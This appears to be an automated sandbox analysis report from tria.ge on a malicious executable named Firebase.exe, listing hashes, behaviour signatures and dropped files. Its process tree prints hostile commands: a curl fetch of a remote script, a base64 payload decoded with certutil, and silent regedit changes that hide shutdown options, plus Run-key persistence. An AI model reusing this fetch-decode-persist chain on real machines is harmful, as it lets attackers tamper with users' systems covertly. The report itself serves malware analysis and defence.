Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    19s
  • max time network
    20s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27/09/2024, 21:41

General

  • Target

    Firebase.exe

  • Size

    154KB

  • MD5

    90400f8a61086d340fb01e7d5149d49c

  • SHA1

    5e094cf298560e8951c87e9da09a8a6700796838

  • SHA256

    100120bd214342195f2605fd330370970095425a5a02dfd8a4f7b389e0ab428c

  • SHA512

    5760feed7757287c7d7591aad0612e345de8dd6c0861f0707928e7119462d96941fc368fe1110d8501755eb77993414a69a3456f2b4df56cf2dce71a104983fb

  • SSDEEP

    3072:2ahKyd2n3175GWp1icKAArDZz4N9GhbkrNEk1vT:2ahOzp0yN90QEM

Malware Config

Signatures

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Deobfuscate/Decode Files or Information 1 TTPs 1 IoCs

    Payload decoded via CertUtil.

  • Runs .reg file with regedit 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Firebase.exe
    "C:\Users\Admin\AppData\Local\Temp\Firebase.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:3496
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c "Firebase.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1168
      • C:\Windows\system32\curl.exe
        curl -s "https://scriptsdatabase-4effc-default-rtdb.firebaseio.com/Data.json"
        3⤵
          PID:1088
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo B64#RUN#QGVjaG8gb2ZmCnNldCByZWdmaWxlPUhpZGVTaHV0ZG93bi5yZWcKCigKICAgIGVjaG8gV2luZG93cyBSZWdpc3RyeSBFZGl0b3IgVmVyc2lvbiA1LjAwCiAgICBlY2hvLgogICAgZWNobyA7IEhpZGUgdGhlIFNodXRkb3duLCBSZXN0YXJ0LCBhbmQgU2xlZXAgb3B0aW9ucwogICAgZWNobyBbSEtFWV9MT0NBTF9NQUNISU5FXFNPRlRXQVJFXE1pY3Jvc29mdFxQb2xpY3lNYW5hZ2VyXGRlZmF1bHRcU3RhcnRcSGlkZVNodXREb3duXQogICAgZWNobyAidmFsdWUiPWR3b3JkOjAwMDAwMDAxCiAgICBlY2hvLgogICAgZWNobyBbSEtFWV9MT0NBTF9NQUNISU5FXFNPRlRXQVJFXE1pY3Jvc29mdFxQb2xpY3lNYW5hZ2VyXGRlZmF1bHRcU3RhcnRcSGlkZVJlc3RhcnRdCiAgICBlY2hvICJ2YWx1ZSI9ZHdvcmQ6MDAwMDAwMDEKICAgIGVjaG8uCiAgICBlY2hvIFtIS0VZX0xPQ0FMX01BQ0hJTkVcU09GVFdBUkVcTWljcm9zb2Z0XFBvbGljeU1hbmFnZXJcZGVmYXVsdFxTdGFydFxIaWRlU2xlZXBdCiAgICBlY2hvICJ2YWx1ZSI9ZHdvcmQ6MDAwMDAwMDEKKSA+ICIlcmVnZmlsZSUiCgpyZWdlZGl0IC9zICIlcmVnZmlsZSUiCgpkZWwgIiVyZWdmaWxlJSIK "
          3⤵
            PID:1800
          • C:\Windows\system32\findstr.exe
            findstr /b "B64#RUN#"
            3⤵
              PID:3376
            • C:\Windows\system32\certutil.exe
              certutil -decode encoded.b64 decoded.bat
              3⤵
              • Deobfuscate/Decode Files or Information
              PID:4832
            • C:\Windows\regedit.exe
              regedit /s "HideShutdown.reg"
              3⤵
              • Runs .reg file with regedit
              PID:1908

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Firebase.bat

          Filesize

          2KB

          MD5

          a8ac75242f5f4e0cea3f1e1f32d61f29

          SHA1

          f6279838cd35263e0d96dc2b5720cff3c44792c6

          SHA256

          94ea0c470eb5a10a15adfa86c1c444dcd2fff82d20dca37ed5462d3a6156a26b

          SHA512

          43270edb11237647e87ba31c00b03443d5cbfb431c24569067156ac48dfdaeac81b614ed4f8e5ad9803fc9f2e40a6b2ff9304f2bdabb5acf9cf328942c02447f

        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HideShutdown.reg

          Filesize

          407B

          MD5

          ba4099bd7ed2d4b20a64a175ceaf8892

          SHA1

          c81486f544f95276c0ace9bbb5264266ecbf9e3c

          SHA256

          0fc71e0e5193447cdf77020bf61757bcd5a80e7889e5185c1a71915aa6fe3688

          SHA512

          5d1c11cdb680703462f4594cb498c6df615d0436440d3c83173f980451ae40e199f6b8f047d8079a2859bb7a646d9b0b8831fff0312ae365ed026d7d5011abad

        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\decoded.bat

          Filesize

          594B

          MD5

          27f70714bc4710f8604f309d0eccf738

          SHA1

          c8f9c770a7d8fcfa7fc29c3ff36e530a4c723148

          SHA256

          5f09a711fbf2469e5849fec0aa0e6a0a95ed1899af7daf2ecfe2ec8bbf502dae

          SHA512

          cf4e50e2b8e0b45e0146937824b852297d8d48b34498bbfd53190ae4f0b9f0514b0248bb2f46ac3525c6270c39dbbf67af1ccd17a28aaa13ea45de74110bea81

        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\encoded.b64

          Filesize

          794B

          MD5

          d70eaab3e1d8a7a15091039df76af539

          SHA1

          fa61ade14f1cb0c331d987b0640966b4af62d55d

          SHA256

          0c5fef1a855c2c350f8a6771302dfba9f1ccd9492c5651f436902a340e2f579c

          SHA512

          e430b44e266ca2bfee2d6b47d2627a2208053d4f1b07384a3528d82839467758db5f631e27be680b40b722153961ea4bda97ea8a2ec168cefe71f434df37c36b